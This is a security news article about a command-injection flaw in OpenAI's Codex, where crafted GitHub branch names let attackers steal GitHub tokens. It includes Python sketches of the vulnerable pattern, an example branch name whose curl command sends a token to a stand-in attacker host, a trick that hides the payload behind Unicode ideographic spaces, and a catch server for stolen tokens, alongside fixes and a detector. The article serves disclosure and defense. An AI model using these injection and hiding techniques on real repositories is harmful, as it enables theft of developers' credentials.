- A carefully crafted branch name can steal your GitHub auth token
- Unicode spaces hide malicious payloads from human eyes
- Attackers can automate token theft between multiple users sharing a repository
Security researchers discovered a command injection vulnerability in OpenAI’s Codex cloud environment that allowed attackers to steal GitHub authentication tokens using nothing more than a carefully crafted branch name.
Research by BeyondTrust Phantom Labs found that the vulnerability stemmed from improper input checking in the way Codex handled GitHub branch names when running tasks.
By injecting arbitrary commands via the branch name parameter, an attacker could execute malicious payloads in the agent container and retrieve sensitive authentication tokens that grant access to connected GitHub repositories.
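The flaw follows the classic shape of shell command injection. A minimal Python sketch of the vulnerable pattern (the function names and the example branch name are illustrative, not taken from Codex's actual code):

```python
def build_checkout_unsafe(branch_name: str) -> str:
    # Vulnerable pattern: the branch name is spliced into a shell string,
    # so metacharacters like ";" act as command separators when it runs.
    return f"git checkout {branch_name}"

def build_checkout_safe(branch_name: str) -> list:
    # Safer pattern: pass the name as a single argv element after "--",
    # so no shell ever parses it and git cannot read it as an option.
    return ["git", "checkout", "--", branch_name]

# A hypothetical malicious branch name (illustrative, not the real payload):
malicious = "main; curl https://attacker.example/?t=$GITHUB_TOKEN"
print(build_checkout_unsafe(malicious))
```

In the unsafe version, everything after the semicolon runs as a second command inside the agent container; the safe version keeps the entire name as one inert argument.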

A vulnerability in plain sight
What makes this attack particularly concerning is the method researchers developed to hide the malicious payload from human detection.
The team identified a way to hide the payload using ideographic space, a Unicode character designated U+3000.
By appending 94 ideographic spaces followed by “or true” to the branch name, the researchers could bypass error conditions while keeping the malicious portion invisible in the Codex UI.
According to the researchers, Bash ignores the ideographic spaces when executing the command, while they effectively hide the attack from any user who views the branch name through the web portal.
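The hiding trick can be reconstructed in a few lines. This sketch uses a made-up branch prefix; only the U+3000 character and the 94-space count come from the research:

```python
# 94 U+3000 ideographic spaces push a trailing payload out of view
# in a fixed-width UI column, leaving only the innocuous prefix visible.
IDEOGRAPHIC_SPACE = "\u3000"

visible_prefix = "feature/login-fix"  # hypothetical, what a reviewer sees
hidden_suffix = "or true"             # per the researchers' proof of concept
branch = visible_prefix + IDEOGRAPHIC_SPACE * 94 + hidden_suffix

print("total length:", len(branch))
print("visible part:", branch[:len(visible_prefix)])
print("hidden part present:", branch.endswith(hidden_suffix))
```

Because U+3000 is a legal character in a Git branch name, nothing in the name itself looks syntactically invalid to the hosting platform.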
The attack could be automated to compromise multiple users interacting with a shared GitHub repository.
With the proper repository permissions, an attacker could create a new branch containing the hidden payload and even set that branch as the default branch of the repository.
Any user who then interacted with this branch via Codex would have their GitHub OAuth token exfiltrated to an external server controlled by the attacker.
The researchers tested this technique by hosting a simple HTTP server on Amazon EC2 to monitor incoming requests, confirming that the stolen tokens were successfully transmitted.
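A catch server of the kind the researchers describe needs almost no code. A minimal sketch using Python's standard library (the handler name and port binding are assumptions for illustration):

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class ExfilLogger(BaseHTTPRequestHandler):
    # Record each request path; a stolen token would typically arrive
    # as a query parameter appended by the injected command.
    def do_GET(self):
        print(f"request from {self.client_address[0]}: {self.path}")
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        # Silence the default per-request stderr logging.
        pass

# Bind to an ephemeral port and serve in a background thread.
server = HTTPServer(("127.0.0.1", 0), ExfilLogger)
threading.Thread(target=server.serve_forever, daemon=True).start()
print("listening on port", server.server_address[1])
```

Any `curl https://listener/?t=$TOKEN` fired from inside the agent container would then show up in the request log, confirming exfiltration.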
The vulnerability affected multiple Codex interfaces, including the ChatGPT website, Codex CLI, Codex SDK, and Codex IDE extension.
Phantom Labs also discovered that authentication tokens stored locally on developers’ machines in the auth.json file could be leveraged to replicate the attack via backend APIs.
Beyond OAuth tokens, the same technique could capture GitHub installation access tokens by referencing Codex in a pull request comment, thereby triggering a code review container that executed the payload.
All reported issues have since been resolved in coordination with the OpenAI security team.
However, this finding raises concerns about how AI coding agents will operate with privileged access.
Traditional security tools like antivirus and firewalls cannot prevent this attack because it occurs in OpenAI’s cloud environment, beyond their visibility.
To stay secure, organizations should audit the permissions of AI tools, especially agents, and enforce least privilege.
They should also monitor repositories for unusual branch names containing Unicode spaces, regularly rotate GitHub tokens, and examine access logs for suspicious API activity.
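Scanning branch names for disguised whitespace is straightforward to automate. A hedged sketch (the function name is illustrative; the check covers Unicode "space separator" characters such as U+3000 plus the zero-width space):

```python
import unicodedata

def hidden_space_report(name: str) -> list:
    # Flag any whitespace that is not a plain ASCII space: Unicode
    # category Zs characters (e.g. U+3000 IDEOGRAPHIC SPACE) and
    # the zero-width space, both of which can hide payloads.
    return [
        f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNKNOWN')} at index {i}"
        for i, ch in enumerate(name)
        if ch != " " and (unicodedata.category(ch) == "Zs" or ch == "\u200b")
    ]

print(hidden_space_report("feature/login-fix\u3000\u3000or true"))
```

Running such a check in CI, or on branch-creation webhooks, surfaces names that render innocently but carry hidden content.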